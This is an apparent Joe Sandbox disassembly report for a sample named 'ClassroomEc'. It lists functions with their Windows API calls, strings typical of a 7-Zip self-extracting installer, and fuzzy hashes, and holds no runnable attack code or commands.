Function 00A73C80 Relevance: 6.0, APIs: 4, Instructions: 50
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 00A73C94
FindClose.KERNEL32(000000FF), ref: 00A73CAB
SetLastError.KERNEL32(00000010), ref: 00A73CBE

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: Find$CloseErrorFileFirstLast
String ID:
API String ID: 4020440971-0
Opcode ID: e07809e3942e522350e73210f68a95774126b1b780e12e54c384071a235bdb47
Instruction ID: 1f2ce7c4d8b47ff14aef77daf7dfa70ab641192c72b5de8d86c88acf72b5f342
Opcode Fuzzy Hash: e07809e3942e522350e73210f68a95774126b1b780e12e54c384071a235bdb47
Instruction Fuzzy Hash: 9711A577A00208EBDF20DBA4DD0969A3374AB44310F22CA55E51EA7191DB31DB85EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00A75080 Relevance: 6.0, APIs: 4, Instructions: 38
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?), ref: 00A75094
FindClose.KERNEL32(000000FF), ref: 00A750AE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00A750C5
DeleteFileW.KERNEL32(?), ref: 00A750D3

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: File$Find$AttributesCloseDeleteFirst
String ID:
API String ID: 3319113142-0
Opcode ID: b9d4bc2e5fc4d7b2d54befb9cd5e373f315851f702001fde9e799a98e6caa387
Instruction ID: b2db8ef18d1953d85f7359b1b66370e55ddc27e1586d452ff312d852ad33a646
Opcode Fuzzy Hash: b9d4bc2e5fc4d7b2d54befb9cd5e373f315851f702001fde9e799a98e6caa387
Instruction Fuzzy Hash: 1AF08675A00A08FFDB10DBB4EC49ADB37749B44311F10C654E91E97180DA75DD879B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A77530 Relevance: 97.2, APIs: 35, Strings: 20, Instructions: 959
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 00A7753F
GetLastError.KERNEL32 ref: 00A77548
GetTickCount.KERNEL32 ref: 00A77551
GetTickCount.KERNEL32 ref: 00A7755E
GetTickCount.KERNEL32 ref: 00A7756B
GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A775C5
GetProcAddress.KERNEL32(?,FreeConsole), ref: 00A775D7
FreeConsole.KERNELBASE ref: 00A775E0
GetCommandLineW.KERNEL32(?), ref: 00A775EC
_DebugHeapAllocator.LIBCPMTD ref: 00A775FF
GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,?,?,00000000), ref: 00A77679
_DebugHeapAllocator.LIBCPMTD ref: 00A77717
_DebugHeapAllocator.LIBCPMTD ref: 00A77726
_DebugHeapAllocator.LIBCPMTD ref: 00A7776A
_DebugHeapAllocator.LIBCPMTD ref: 00A77786
_DebugHeapAllocator.LIBCPMTD ref: 00A777B8

Part of subcall function 00A76D00: lstrlenW.KERNEL32(?), ref: 00A76D5E
Part of subcall function 00A76D00: lstrlenW.KERNEL32(?), ref: 00A76D6B

_DebugHeapAllocator.LIBCPMTD ref: 00A777FB
wsprintfW.USER32 ref: 00A779D2

Strings

d, xrefs: 00A776E0
SfxString%d, xrefs: 00A779C6
SetEnvironment, xrefs: 00A77A71
kernel32.dll, xrefs: 00A775C0
7ZipSfx.%03x, xrefs: 00A77F16
Shortcut, xrefs: 00A78248
ExecuteFile, xrefs: 00A77E08, 00A77E19
AutoInstall, xrefs: 00A77CEF, 00A77DE6
RunProgram, xrefs: 00A77E3B, 00A77E4C
HelpText, xrefs: 00A77B31
sfxtest, xrefs: 00A776C6
, xrefs: 00A77A22
sfxconfig, xrefs: 00A778C8
FreeConsole, xrefs: 00A775CE
sfxversion, xrefs: 00A7761B
BeginPrompt, xrefs: 00A77C21
Delete, xrefs: 00A7827A
FinishMessage, xrefs: 00A782D6
SelfDelete, xrefs: 00A7837C
InstallPath, xrefs: 00A77BE7

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$CountTick$Modulelstrlen$?_set_new_handler@@AddressCommandConsoleErrorFileFreeHandleLastLineNameProcwsprintf
String ID: $7ZipSfx.%03x$AutoInstall$BeginPrompt$Delete$ExecuteFile$FinishMessage$FreeConsole$HelpText$InstallPath$RunProgram$SelfDelete$SetEnvironment$SfxString%d$Shortcut$d$kernel32.dll$sfxconfig$sfxtest$sfxversion
API String ID: 313208911-2568464168
Opcode ID: 870a1e580e130d5d4cb1ce0966129916dae47b465481e3dc382322909aaf7368
Instruction ID: 80b6275317ed15fa10a511d05ccc15ec49413ada94af2207203a49b0e96623e6
Opcode Fuzzy Hash: 870a1e580e130d5d4cb1ce0966129916dae47b465481e3dc382322909aaf7368
Instruction Fuzzy Hash: EE8281B0E001199BCB14FBA9DD56BEE77B4EF54304F50C068F0096B192EF746A95CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A71F80 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 289
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A73520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00A71FB2,?), ref: 00A73541
Part of subcall function 00A73520: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00A73564

_wtol.MSVCRT(?,?,?,?,?,?,?,?), ref: 00A72036
_DebugHeapAllocator.LIBCPMTD ref: 00A72124
_DebugHeapAllocator.LIBCPMTD ref: 00A7214B
_DebugHeapAllocator.LIBCPMTD ref: 00A7218A
_DebugHeapAllocator.LIBCPMTD ref: 00A721BC
_DebugHeapAllocator.LIBCPMTD ref: 00A72268

Strings

ExecuteParameters, xrefs: 00A72152
del, xrefs: 00A72082
hidcon, xrefs: 00A71FDF
shc, xrefs: 00A7204E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap$CurrentDirectory$_wtol
String ID: ExecuteParameters$del$hidcon$shc
API String ID: 1551080378-796110186
Opcode ID: d07ab29fecab1d6dd4e29405ce564345baf908bb86a0ca6cb8044e35745d35c1
Instruction ID: 31c626c91a92ba0ad895c8d48bfa88a62bb4824e6e50817611818819f2b3ee7a
Opcode Fuzzy Hash: d07ab29fecab1d6dd4e29405ce564345baf908bb86a0ca6cb8044e35745d35c1
Instruction Fuzzy Hash: 26B19DB0D002099BDB14EFA4DD52BFFB7B4BF14304F14C529E42A67292EB34A946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A72640 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 444
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 00A7289F

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e89a9bf539e5bc76f4d855d7a1d1a6d7e7752adb7f2ac411502418775c5ac6a9
Instruction ID: 4fef3a7a57e398acf252c4da0ebebc57da74546f8060fce55aea7792240da779
Opcode Fuzzy Hash: e89a9bf539e5bc76f4d855d7a1d1a6d7e7752adb7f2ac411502418775c5ac6a9
Instruction Fuzzy Hash: 56120A719102189BDF18EFA5CD91BED77B5FF58300F10C168E50A6B292EB30AA85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B950 Relevance: 13.1, APIs: 6, Strings: 1, Instructions: 843
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00A7BF2E

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 22b8f02be49cb56784ccb6d1d62d7d06005b7f78b58a8ab03e6b6d705e9ee820
Instruction ID: 0f00e244baf0bc5d5b6714fd3cbaf77910bd4995578e96cbec0cfb41e8bb1b4b
Opcode Fuzzy Hash: 22b8f02be49cb56784ccb6d1d62d7d06005b7f78b58a8ab03e6b6d705e9ee820
Instruction Fuzzy Hash: B792B2759001289BDB68EF64CD91BEDB7B5AF58304F10C1E9E50EA7252DB30AE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A76680 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 00A7668E
#17.COMCTL32 ref: 00A76699

Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75EC8
Part of subcall function 00A75E70: wsprintfW.USER32 ref: 00A75EDE
Part of subcall function 00A75E70: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00A75EEF
Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75EF8
Part of subcall function 00A75E70: ??2@YAPAXI@Z.MSVCRT ref: 00A75F1D
Part of subcall function 00A75E70: GetEnvironmentVariableW.KERNEL32(?,?,00A7B311), ref: 00A75F43
Part of subcall function 00A75E70: GetLastError.KERNEL32 ref: 00A75F52
Part of subcall function 00A75E70: lstrcmpiW.KERNEL32(00000000,?), ref: 00A75F80
Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FA3
Part of subcall function 00A75E70: SetLastError.KERNEL32(?), ref: 00A76003

Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FCC
Part of subcall function 00A75E70: ??3@YAXPAX@Z.MSVCRT ref: 00A75FF7
Part of subcall function 00A75E70: lstrlenA.KERNEL32(?), ref: 00A76067
Part of subcall function 00A75E70: ??2@YAPAXI@Z.MSVCRT ref: 00A7608A
Part of subcall function 00A75E70: GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00A760D3
Part of subcall function 00A75E70: _wtol.MSVCRT(?), ref: 00A760E4
Part of subcall function 00A75E70: MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00A76117

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000040,00000000), ref: 00A7674C
wsprintfW.USER32 ref: 00A7676D

Strings

SfxFolder%02d, xrefs: 00A76761
@, xrefs: 00A7672D
kernel32, xrefs: 00A76689

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorLast$??3@$??2@EnvironmentVariablewsprintf$ByteCharFolderInfoLibraryLoadLocaleMultiPathSpecialWide_wtollstrcmpilstrlen
String ID: @$SfxFolder%02d$kernel32
API String ID: 2629262089-574402807
Opcode ID: 4636b8e672774bbc400aae3e23cc98b81a16c5b3afeb624ee840319f83123109
Instruction ID: 4eee9ce6c845c87e154dbd44864f11f7f6d76479c362dc3ff7d05244e193eb21
Opcode Fuzzy Hash: 4636b8e672774bbc400aae3e23cc98b81a16c5b3afeb624ee840319f83123109
Instruction Fuzzy Hash: 3D31C6B5E44208AFEF10EFB0ED49B6A7374BB40308F0081AAE50D5B251EB716A95CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00A72D40 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117
threadsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A72F60: _DebugHeapAllocator.LIBCPMTD ref: 00A72F71

CreateThread.KERNELBASE(00000000,00000000,Function_00002FA0,?,00000000,?), ref: 00A72D7B
WaitForSingleObject.KERNEL32(00000288,000000FF), ref: 00A72DA6

Part of subcall function 00A7B300: wvsprintfW.USER32(?,?,?), ref: 00A7B32D
Part of subcall function 00A7B300: GetLastError.KERNEL32 ref: 00A7B33D
Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,?,?,00000000,00000000), ref: 00A7B36C
Part of subcall function 00A7B300: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00000000,?,?,00000000,00000000), ref: 00A7B393
Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3A8
Part of subcall function 00A7B300: lstrlenW.KERNEL32(?,?,?,00000000,00000000), ref: 00A7B3BB
Part of subcall function 00A7B300: ??2@YAPAXI@Z.MSVCRT ref: 00A7B3DC
Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B404
Part of subcall function 00A7B300: lstrcpyW.KERNEL32(?,?), ref: 00A7B437
Part of subcall function 00A7B300: ??3@YAXPAX@Z.MSVCRT ref: 00A7B45F
Part of subcall function 00A7B300: LocalFree.KERNEL32(?), ref: 00A7B46E

GetExitCodeThread.KERNELBASE(00000288,00000000), ref: 00A72E58
SetLastError.KERNEL32(00000000), ref: 00A72EA9

Strings

i, xrefs: 00A72DD1

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorFormatLastMessageThreadlstrcpylstrlen$??2@??3@AllocatorCodeCreateDebugExitFreeHeapLocalObjectSingleWaitwvsprintf
String ID: i
API String ID: 974866615-3865851505
Opcode ID: 98b9f7a494858d350d6103c2d3ad143c1abd09f31e293a9ac05f99491dc1c33c
Instruction ID: 0390908f10b8a6d76a443f379160f200de286df96f466f0a22087c80ff0468c7
Opcode Fuzzy Hash: 98b9f7a494858d350d6103c2d3ad143c1abd09f31e293a9ac05f99491dc1c33c
Instruction Fuzzy Hash: D141CFB5A44208EBD720DBD8ED06B693BB0FB84305F10C21AF50D5A2D1DB7069C5DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00A73790 Relevance: 7.6, APIs: 5, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A735B0: _DebugHeapAllocator.LIBCPMTD ref: 00A735C0
Part of subcall function 00A735B0: wcsncpy.MSVCRT ref: 00A735E4

GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00A737AB
GetTempPathW.KERNEL32(-00000001,00000000,-00000001,00000000), ref: 00A737DB
wsprintfW.USER32 ref: 00A73833
GetFileAttributesW.KERNELBASE(00000000), ref: 00A7384D
_DebugHeapAllocator.LIBCPMTD ref: 00A73863

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeapPathTemp$AttributesFilewcsncpywsprintf
String ID:
API String ID: 3320338524-0
Opcode ID: 273f3a6e22fbfeadde3b4f830dbeabaa54ff98c68b74e43760481de76d54f3f7
Instruction ID: 2328ac48eec3a4293d6843a03b93b4cad87dbe33cc55f5fb8155f3ad8bd335cd
Opcode Fuzzy Hash: 273f3a6e22fbfeadde3b4f830dbeabaa54ff98c68b74e43760481de76d54f3f7
Instruction Fuzzy Hash: BB21FE71900109AFCF04EFA8CE92AFE77B4AF44305F10C119E509B7191EB706B45DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A73D20 Relevance: 7.5, APIs: 5, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(00A74DBB,00000000,00A74DBB,00000000,?,?,?,?,?,?,?,?,?,?,?,00A72B43), ref: 00A73D2C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00A72B43,00000000,00000000,?), ref: 00A73D36
SetLastError.KERNEL32(000000B7), ref: 00A73D4C
GetFileAttributesW.KERNELBASE(000000B7), ref: 00A73D5A
SetLastError.KERNEL32(000000B7), ref: 00A73D75

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ErrorLast$AttributesCreateDirectoryFile
String ID:
API String ID: 635176117-0
Opcode ID: 52dd6a08285c4acb4c4a926ba66bbf9f53f47e780932e4fc3d9f7005511399f5
Instruction ID: cad3d46502365b07a13c790b76397ed00fe156da45df25003e7c05a0bdef9504
Opcode Fuzzy Hash: 52dd6a08285c4acb4c4a926ba66bbf9f53f47e780932e4fc3d9f7005511399f5
Instruction Fuzzy Hash: 2BF03135A00208FFDF20EBF8DC4C6AE7B74AB08345F11C959E81997151DB359A51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A73E20 Relevance: 6.4, APIs: 5, Instructions: 160
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(?), ref: 00A73E56
lstrlenA.KERNEL32(?), ref: 00A73E63
memcmp.MSVCRT ref: 00A73F5F
memmove.MSVCRT ref: 00A74064

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: lstrlen$memcmpmemmove
String ID:
API String ID: 2994076250-0
Opcode ID: 316da79ca7f263f1c17a49bb85647f09c29c2c8284ec7c03d89f132c8a4b3057
Instruction ID: 7ece3c32b378b772bb499c21fb7e3d2f17863b776971b1c36de43a5c45f825c2
Opcode Fuzzy Hash: 316da79ca7f263f1c17a49bb85647f09c29c2c8284ec7c03d89f132c8a4b3057
Instruction Fuzzy Hash: 95614871A002999BCF10CF98CD94BEEB7B5BB48380F10C199E999A7284D7B59B81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A761F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

;!@Install@!UTF-8!, xrefs: 00A7621D
;!@InstallEnd@!, xrefs: 00A76218

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: lstrlen$FormatMessagelstrcpy$??2@??3@ErrorFreeLastLocalwvsprintf
String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 617470318-372238525
Opcode ID: fb9bdc9020eb104d880ce1274a2aabe47252ce1a476b4fe69a12c87d67f2b422
Instruction ID: 1f3eb6e50fe87785a379c0246d4293952db208d7819c43c3eda301e25455a1f9
Opcode Fuzzy Hash: fb9bdc9020eb104d880ce1274a2aabe47252ce1a476b4fe69a12c87d67f2b422
Instruction Fuzzy Hash: 05215CB5E00609ABDB04EF94DC92BEE77B4AF14704F50C558F5196A1C2EBB0AA18C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A76180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(75900000,GetNativeSystemInfo), ref: 00A76191
GetNativeSystemInfo.KERNELBASE(?), ref: 00A761A4

Strings

GetNativeSystemInfo, xrefs: 00A76186

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AddressInfoNativeProcSystem
String ID: GetNativeSystemInfo
API String ID: 2220751540-3949249589
Opcode ID: 884ef408b6d39cefc2ac3173850accadcb0ab4a0a3f633dc9b0d903a93e9b641
Instruction ID: 0ee09b28066b9d3121f9f795b07dc58707500564a61cf47f6f139f89046e535e
Opcode Fuzzy Hash: 884ef408b6d39cefc2ac3173850accadcb0ab4a0a3f633dc9b0d903a93e9b641
Instruction Fuzzy Hash: A8E08C30E01208EBCF04DBE88D0C6EEB7F8AB08301F10864AE805A3180EA349A84D761

Uniqueness

Uniqueness Score: -1.00%

Function 00A72390 Relevance: 4.6, APIs: 3, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 00A723A4
_DebugHeapAllocator.LIBCPMTD ref: 00A72435
_DebugHeapAllocator.LIBCPMTD ref: 00A7246C

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID:
API String ID: 571936431-0
Opcode ID: 4b675a789d6c5200897ced8ee72c9d0a13f9953e3552cd71daa220115c11cae9
Instruction ID: 9934a606ad3f7553469dc4d222ad6450ecdc56b988605f76f815dae0ce66b03a
Opcode Fuzzy Hash: 4b675a789d6c5200897ced8ee72c9d0a13f9953e3552cd71daa220115c11cae9
Instruction Fuzzy Hash: F2310DB56002199BCB04DF95CD91AFF77B5BF54304F50C429F81AAB291EB34AD60CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A89300 Relevance: 4.6, APIs: 3, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00A8933A
??3@YAXPAX@Z.MSVCRT ref: 00A89357
_wmemmove.LIBCMTD ref: 00A8938A

Memory Dump Source

Source File: 00000008.00000002.2222445325.0000000000A71000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00A70000, based on PE: true

Associated: 00000008.00000002.2222418568.0000000000A70000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222597252.0000000000A99000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222627810.0000000000A9D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2222655994.0000000000AA0000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_a70000_ClassroomEc.jbxd

Similarity

API ID: ??2@??3@_wmemmove
String ID:
API String ID: 328067375-0
Opcode ID: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
Instruction ID: 4792df1586ecebb790b33bf324994375c68d30e7e59cc99f5873874efa63fd49
Opcode Fuzzy Hash: 57640352dee917e0f3097d4ee9c6a7c98d6df61b4aaa9fea7e377f44341e8775
